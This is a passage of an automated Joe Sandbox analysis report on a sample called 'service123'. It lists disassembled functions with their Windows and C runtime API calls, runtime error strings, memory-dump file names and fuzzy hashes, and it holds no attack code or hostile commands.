Instruction Fuzzy Hash: 7E51FAE02093C5CAEF11DB39C0497817FF8675330CF0C4599DA885B6CAD3BA6509CB6A

Function 6C2BD570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 75d70ef71be738e35cc4120956a7075a7a6cb730bbfea67cc8e45a72b8046090
Instruction ID: 643a664a68b8a87032024affe5e567101be1d861a9712c59b3ec8b3000d737ff
Opcode Fuzzy Hash: 75d70ef71be738e35cc4120956a7075a7a6cb730bbfea67cc8e45a72b8046090
Instruction Fuzzy Hash: 9A31C67061930B8FD3109E69D8807AAB7E0EB8535CF14892EE998A7B05D335E4448F91

Function 6C2BD67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction ID: aab99342e4105205caff6913648b1f9e30ad831849c4f9eb9dd681538af036bc
Opcode Fuzzy Hash: 6a978986521d2faa4f21e49faa05e83597843df431b75155095465bb83b63a9b
Instruction Fuzzy Hash: F9B01211EEA12CC340803BB50C400B5B2389F0338C7007D004D0733E010B30F4589C66

Function 6C2BD6C0 Relevance: 27.1, APIs: 18, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 7faa632db394940414cd03ce825e1ed2401971c1715030121cf4353e2a81f863
Instruction ID: 062f1b50f014602c2ba2f70b2771acb9e6d03e3c3f9731bfc714ace231495755
Opcode Fuzzy Hash: 7faa632db394940414cd03ce825e1ed2401971c1715030121cf4353e2a81f863
Instruction Fuzzy Hash: 8A4179B0A0930A8FD310DF19C480B9ABBE0EF89749F108D2EE898D7B55D334D8448F82

Function 6C2BD855 Relevance: 25.5, APIs: 17, Instructions: 45COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4853ba63ffc103d4c010a14dbb3924bf2519af791599fe1b70fd473eebfd258a
Instruction ID: da878fa4ac49b19d473f5a6c88b4bb53083b7329793ffe65e64edbca0f8828ac
Opcode Fuzzy Hash: 4853ba63ffc103d4c010a14dbb3924bf2519af791599fe1b70fd473eebfd258a
Instruction Fuzzy Hash: 81E0E57190924B8BD300FE68C0803657BA1AF8330CF441988DD4627A46C335B44FCB42

Function 6C2CC330 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C2CC3A1
fwrite.MSVCRT ref: 6C2CC448
fputs.MSVCRT ref: 6C2CC465
fwrite.MSVCRT ref: 6C2CC48E
fputs.MSVCRT ref: 6C2CC4AD
fwrite.MSVCRT ref: 6C2CC4DC
fwrite.MSVCRT ref: 6C2CC50E
abort.MSVCRT ref: 6C2CC513
abort.MSVCRT ref: 6C386157
free.MSVCRT ref: 6C38615F

Part of subcall function 6C2BA340: strlen.MSVCRT ref: 6C2BA3C5
Part of subcall function 6C2BA340: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2CC41C), ref: 6C2BA3E0
Part of subcall function 6C2BA340: free.MSVCRT ref: 6C2BA3EA

Strings

not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 6C2CC349
terminate called without an active exception, xrefs: 6C2CC4D5
terminate called after throwing an instance of ', xrefs: 6C2CC441
-, xrefs: 6C2CC4C1

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called without an active exception
API String ID: 4144276882-4175505668
Opcode ID: 5ed2f843e4fe65219110f1cd79998b4dafba77aae98235c343de1f50a4d12d73
Instruction ID: 473d5e11d5dfd61d3b5d55de2abf402a73561c79ea0aecfa78261ce4b6536961
Opcode Fuzzy Hash: 5ed2f843e4fe65219110f1cd79998b4dafba77aae98235c343de1f50a4d12d73
Instruction Fuzzy Hash: BF5138B49093199FD700BF65C48879ABBF8AF86308F118A1DE8D987741D7799488CF93

Function 6C2BD8A8 Relevance: 24.1, APIs: 16, Instructions: 52COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7175e0e5dde6e1b90ad639770240560cef0569e9f5b65ca252f5907a4a3be5ce
Instruction ID: 244adbe667400bfcfc62267cf6faba6e678035c94a8da20b4b0ccb52f859e03e
Opcode Fuzzy Hash: 7175e0e5dde6e1b90ad639770240560cef0569e9f5b65ca252f5907a4a3be5ce
Instruction Fuzzy Hash: 49F089B096534A8FD3109F5884817657BA17B83359F480D84DC442BB42D3359499DBA1

Function 6C2BDE50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

@, xrefs: 6C2BDEB8

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 7130737d28e8fca7ea8974ff01647c4f01f75848290cd2d6fae7b3457bc1fece
Instruction ID: b843658c4762341a0b30da1dd26014f32f821ea15516f57c644772498d7c96d3
Opcode Fuzzy Hash: 7130737d28e8fca7ea8974ff01647c4f01f75848290cd2d6fae7b3457bc1fece
Instruction Fuzzy Hash: F6219371A0525ECBDB10DF54CC84BD9B7B8AB8635DF1045A6ED08BB614E7309A888F80

Function 6C2BDA90 Relevance: 22.6, APIs: 15, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6bd441deb7e1429d67f9e8428cec9f62b5aad65d568d9d16cf9aad95fd57f726
Instruction ID: de6db37d3a6e10ef23e20ef1e48996c9b2d3520f4c95bf3f6c345ab3fdd5415b
Opcode Fuzzy Hash: 6bd441deb7e1429d67f9e8428cec9f62b5aad65d568d9d16cf9aad95fd57f726
Instruction Fuzzy Hash: FA413975A0421D9BCB10DF65C880BDEB7B1AF89358F1489A9EC09B7705D730AE88CF91

Function 6C2BDCE0 Relevance: 21.1, APIs: 14, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 305bb00bdbc5498656a84ca6c8ac624cfe2880235774ead4edb4ea0d90856357
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: F2110A75A0021DDBCB14EF65C8809DEB7B5AF85358F048968EC0977B05DB30AE49DB91

Function 6C2BDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: c93a379ac0ea63360719d04dd4755270721ee9a048717b1cdc309a9d0b9a5d78
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: 4421F774A0021E9BCF50DF61C8809DEB7B5AF85348F1489A8DD0977745D730AE498F91

Function 6C2C0310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C38395F), ref: 6C2C034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C38395F), ref: 6C2C0352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C38395F), ref: 6C2C0360

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 2efdd15a99503eee4f02394b2bfac8d11296e211b5c4b2fb4d3bde356af62bb9
Instruction ID: 26939adf9b1c43b1c2f6106dad0fcef901a5b2b91b213ed3e1786b52d33b6619
Opcode Fuzzy Hash: 2efdd15a99503eee4f02394b2bfac8d11296e211b5c4b2fb4d3bde356af62bb9
Instruction Fuzzy Hash: 33516BB070934A8FCB40EF29C484A4AB7F9BB86308F15462DEC5987714EB30E845CB93

Function 6C2BA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C2BA6BF
vfprintf.MSVCRT ref: 6C2BA6DF
abort.MSVCRT ref: 6C2BA6E4
VirtualQuery.KERNEL32 ref: 6C2BA77B

Strings

Address %p has no image-section, xrefs: 6C2BA83B
VirtualProtect failed with code 0x%x, xrefs: 6C2BA7F6
VirtualQuery failed for %d bytes at address %p, xrefs: 6C2BA827
Mingw-w64 runtime failure:, xrefs: 6C2BA6B8

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 99c2ae5ce76f298089269afb8842a818ffc4c97bb13888d8bbcb6268f9946f56
Instruction ID: 8a2810d2da2af373af4281dc2106dc9ea09e1f2653983dc403b98633c9b9eeb0
Opcode Fuzzy Hash: 99c2ae5ce76f298089269afb8842a818ffc4c97bb13888d8bbcb6268f9946f56
Instruction Fuzzy Hash: 67516BB2A08305DFC700DF29C88169ABBF4FF85398F51891CE98897654E730E449CB92

Function 00AC1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00AC196F
vfprintf.MSVCRT ref: 00AC198F
abort.MSVCRT ref: 00AC1994
VirtualQuery.KERNEL32 ref: 00AC1A2B

Strings

Address %p has no image-section, xrefs: 00AC1AEB
VirtualQuery failed for %d bytes at address %p, xrefs: 00AC1AD7
Mingw-w64 runtime failure:, xrefs: 00AC1968
VirtualProtect failed with code 0x%x, xrefs: 00AC1AA6

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: d423dcbeb91ce456cfc5e1197b01c20b8ba79a8165ec55a6850e7cff9a41e0ba
Instruction ID: d555f3c7913ac3793ee30d9c5980f9049efc320fbe64d7b8061f8cc01421b20b
Opcode Fuzzy Hash: d423dcbeb91ce456cfc5e1197b01c20b8ba79a8165ec55a6850e7cff9a41e0ba
Instruction Fuzzy Hash: AB5169B1608300CFC710EF69D985B5AFBE0FF85354F57892DE8899B212D734E8468B92

Function 6C2BE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
